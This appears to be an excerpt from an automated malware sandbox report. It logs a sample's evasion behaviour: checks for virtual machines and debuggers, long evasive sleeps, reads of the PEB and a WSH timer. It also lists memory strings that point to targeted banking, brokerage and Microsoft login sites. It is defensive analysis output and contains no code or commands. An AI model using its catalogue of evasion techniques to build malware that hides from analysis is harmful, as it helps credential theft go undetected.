Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BD1C0 rdtsc 5_2_032BD1C0
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347799BE sldt word ptr [eax] 4_2_00007FFD347799BE
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1611 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1493 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4475 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5377 Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Window / User API: threadDelayed 1439 Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Window / User API: threadDelayed 8534 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\appidtel.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\dllhost.exe API coverage: 2.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5412 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796 Thread sleep count: 4475 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5936 Thread sleep count: 5377 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6096 Thread sleep time: -15679732462653109s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908 Thread sleep count: 1439 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908 Thread sleep time: -2878000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908 Thread sleep count: 8534 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908 Thread sleep time: -17068000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe TID: 1592 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\dllhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\dllhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0309C3C0 FindFirstFileW,FindNextFileW,FindClose, 11_2_0309C3C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: -400GIK8.11.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: -400GIK8.11.dr Binary or memory string: discord.comVMware20,11696487552f
Source: -400GIK8.11.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: agement pageVMware20,11696487552
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,1169648
Source: -400GIK8.11.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: QEwzeZKCXN.exe, 0000000C.00000002.3411016240.000000000124F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: swordVMware20,11696487552}
Source: -400GIK8.11.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,116964875
Source: -400GIK8.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: global block list test formVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: -400GIK8.11.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000000D.00000002.3048982988.0000015C8A0DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -400GIK8.11.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: -400GIK8.11.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: omVMware4
Source: -400GIK8.11.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20D
Source: -400GIK8.11.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: powershell.exe, 00000004.00000002.2358982839.000001FEBE0C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWcl%SystemRoot%\system32\mswsock.dll
Source: -400GIK8.11.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: -400GIK8.11.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: -400GIK8.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20
Source: -400GIK8.11.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: -400GIK8.11.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: -400GIK8.11.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ive Brokers - NDCDYNVMware20,11696487552z
Source: -400GIK8.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\appidtel.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BD1C0 rdtsc 5_2_032BD1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00417443 LdrLoadDll, 5_2_00417443
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326F32A mov eax, dword ptr fs:[00000030h] 5_2_0326F32A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03237330 mov eax, dword ptr fs:[00000030h] 5_2_03237330
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330132D mov eax, dword ptr fs:[00000030h] 5_2_0330132D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330132D mov eax, dword ptr fs:[00000030h] 5_2_0330132D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C930B mov eax, dword ptr fs:[00000030h] 5_2_032C930B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C930B mov eax, dword ptr fs:[00000030h] 5_2_032C930B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C930B mov eax, dword ptr fs:[00000030h] 5_2_032C930B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327A30B mov eax, dword ptr fs:[00000030h] 5_2_0327A30B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327A30B mov eax, dword ptr fs:[00000030h] 5_2_0327A30B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327A30B mov eax, dword ptr fs:[00000030h] 5_2_0327A30B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323C310 mov ecx, dword ptr fs:[00000030h] 5_2_0323C310
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03260310 mov ecx, dword ptr fs:[00000030h] 5_2_03260310
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF367 mov eax, dword ptr fs:[00000030h] 5_2_032FF367
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032E437C mov eax, dword ptr fs:[00000030h] 5_2_032E437C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03247370 mov eax, dword ptr fs:[00000030h] 5_2_03247370
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03247370 mov eax, dword ptr fs:[00000030h] 5_2_03247370
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03247370 mov eax, dword ptr fs:[00000030h] 5_2_03247370
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330A352 mov eax, dword ptr fs:[00000030h] 5_2_0330A352
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323D34C mov eax, dword ptr fs:[00000030h] 5_2_0323D34C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323D34C mov eax, dword ptr fs:[00000030h] 5_2_0323D34C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315341 mov eax, dword ptr fs:[00000030h] 5_2_03315341
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239353 mov eax, dword ptr fs:[00000030h] 5_2_03239353
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239353 mov eax, dword ptr fs:[00000030h] 5_2_03239353
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C035C mov eax, dword ptr fs:[00000030h] 5_2_032C035C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C035C mov eax, dword ptr fs:[00000030h] 5_2_032C035C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C035C mov eax, dword ptr fs:[00000030h] 5_2_032C035C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C035C mov ecx, dword ptr fs:[00000030h] 5_2_032C035C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C035C mov eax, dword ptr fs:[00000030h] 5_2_032C035C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C035C mov eax, dword ptr fs:[00000030h] 5_2_032C035C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032633A5 mov eax, dword ptr fs:[00000030h] 5_2_032633A5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032733A0 mov eax, dword ptr fs:[00000030h] 5_2_032733A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032733A0 mov eax, dword ptr fs:[00000030h] 5_2_032733A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326438F mov eax, dword ptr fs:[00000030h] 5_2_0326438F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326438F mov eax, dword ptr fs:[00000030h] 5_2_0326438F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323E388 mov eax, dword ptr fs:[00000030h] 5_2_0323E388
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323E388 mov eax, dword ptr fs:[00000030h] 5_2_0323E388
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323E388 mov eax, dword ptr fs:[00000030h] 5_2_0323E388
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0331539D mov eax, dword ptr fs:[00000030h] 5_2_0331539D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0329739A mov eax, dword ptr fs:[00000030h] 5_2_0329739A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0329739A mov eax, dword ptr fs:[00000030h] 5_2_0329739A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03238397 mov eax, dword ptr fs:[00000030h] 5_2_03238397
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03238397 mov eax, dword ptr fs:[00000030h] 5_2_03238397
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03238397 mov eax, dword ptr fs:[00000030h] 5_2_03238397
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF3E6 mov eax, dword ptr fs:[00000030h] 5_2_032FF3E6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h] 5_2_032503E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h] 5_2_032503E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h] 5_2_032503E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h] 5_2_032503E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h] 5_2_032503E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h] 5_2_032503E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h] 5_2_032503E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h] 5_2_032503E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033153FC mov eax, dword ptr fs:[00000030h] 5_2_033153FC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E3F0 mov eax, dword ptr fs:[00000030h] 5_2_0325E3F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E3F0 mov eax, dword ptr fs:[00000030h] 5_2_0325E3F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E3F0 mov eax, dword ptr fs:[00000030h] 5_2_0325E3F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032763FF mov eax, dword ptr fs:[00000030h] 5_2_032763FF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FC3CD mov eax, dword ptr fs:[00000030h] 5_2_032FC3CD
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0324A3C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0324A3C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0324A3C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0324A3C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0324A3C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0324A3C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032483C0 mov eax, dword ptr fs:[00000030h] 5_2_032483C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032483C0 mov eax, dword ptr fs:[00000030h] 5_2_032483C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032483C0 mov eax, dword ptr fs:[00000030h] 5_2_032483C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032483C0 mov eax, dword ptr fs:[00000030h] 5_2_032483C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C63C0 mov eax, dword ptr fs:[00000030h] 5_2_032C63C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FB3D0 mov ecx, dword ptr fs:[00000030h] 5_2_032FB3D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315227 mov eax, dword ptr fs:[00000030h] 5_2_03315227
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323823B mov eax, dword ptr fs:[00000030h] 5_2_0323823B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03277208 mov eax, dword ptr fs:[00000030h] 5_2_03277208
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03277208 mov eax, dword ptr fs:[00000030h] 5_2_03277208
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03244260 mov eax, dword ptr fs:[00000030h] 5_2_03244260
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03244260 mov eax, dword ptr fs:[00000030h] 5_2_03244260
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03244260 mov eax, dword ptr fs:[00000030h] 5_2_03244260
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323826B mov eax, dword ptr fs:[00000030h] 5_2_0323826B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03269274 mov eax, dword ptr fs:[00000030h] 5_2_03269274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03281270 mov eax, dword ptr fs:[00000030h] 5_2_03281270
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03281270 mov eax, dword ptr fs:[00000030h] 5_2_03281270
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330D26B mov eax, dword ptr fs:[00000030h] 5_2_0330D26B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330D26B mov eax, dword ptr fs:[00000030h] 5_2_0330D26B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239240 mov eax, dword ptr fs:[00000030h] 5_2_03239240
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239240 mov eax, dword ptr fs:[00000030h] 5_2_03239240
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327724D mov eax, dword ptr fs:[00000030h] 5_2_0327724D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C8243 mov eax, dword ptr fs:[00000030h] 5_2_032C8243
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C8243 mov ecx, dword ptr fs:[00000030h] 5_2_032C8243
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A250 mov eax, dword ptr fs:[00000030h] 5_2_0323A250
